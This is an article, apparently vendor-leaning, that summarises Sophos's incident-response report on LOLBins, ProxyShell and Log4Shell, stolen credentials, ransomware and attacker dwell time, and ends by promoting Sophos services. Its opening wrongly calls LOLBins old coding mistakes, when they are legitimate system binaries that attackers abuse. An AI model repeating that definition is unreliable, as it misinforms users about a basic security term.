Some of the most dangerous vulnerabilities facing companies today are the ones that, in any other world, would remain entirely unnoticed. Known as LOLBins – a reference to ‘Living off the Land’ binaries, rather than the practice of maniacally laughing at refuse receptacles – these vulnerabilities are naturally occurring executables found on operating systems; mistakes in the code made long ago that remain overlooked by developers, but eagerly sought after by your average cybercriminal.
Then, of course, comes the cornucopia of other vulnerabilities that provide threat actors with a window into the inner workings of your corporation. According to Sophos’s new ‘Active Adversary Report for Business Leaders,’ an analysis of 152 incident response (IR) investigations across 31 countries, ProxyShell and Log4Shell vulnerabilities loomed particularly large. Compromised credentials are also a particular source of concern, explains John Shier, the cybersecurity firm’s field CTO.
“When today’s attackers aren’t breaking in, they’re logging in,” says Shier. “The reality is that the threat environment has grown in volume and complexity to the point where there are no discernible gaps for defenders to exploit. For most organisations, the days of going at it alone are well behind them.”
Ransomware epidemic
Ransomware, meanwhile, has halted its exponential growth as an attack method. Even so, it remains a plague. Two-thirds of the firms investigated by the Sophos IR team found that this form of digital hostage-taking was deemed a threat – unsurprising, given that ransomware featured in almost three-quarters of their investigations over the past three years. Attacker dwell time is also decreasing. Sophos data reveals that, for all attack types, threat actors are spending an average of ten days inside company systems, down from 15 the previous year. That did not vary across company size.
There are solutions out there – services that can help companies formulate defences-in-depth to better shield themselves from attack. “Organisations that have successfully implemented layered defences with constant monitoring are seeing better outcomes in terms of attack severity,” says Shier. The reason is simple: improved defences mean, in turn, that adversaries speed up their attacks, become more visible to IT security departments, and get dealt with at a much earlier stage than they otherwise would have been. Conversely, adds Shier, “those without proactive monitoring will suffer the greatest consequences”.
In short, therefore, businesses should not lose heart. While the threat environment is continually evolving, Sophos remains ready to blunt the opportunistic adventures of cybercriminals by offering services such as its cloud-based central management console and access to Sophos X-Ops, its cross-domain threat intelligence unit. “It truly is everything, everywhere, all at once,” says Shier of the current threat environment. “However, there are tools and services available to businesses that can alleviate some of the defensive burden, allowing them to focus on their core business priorities.”
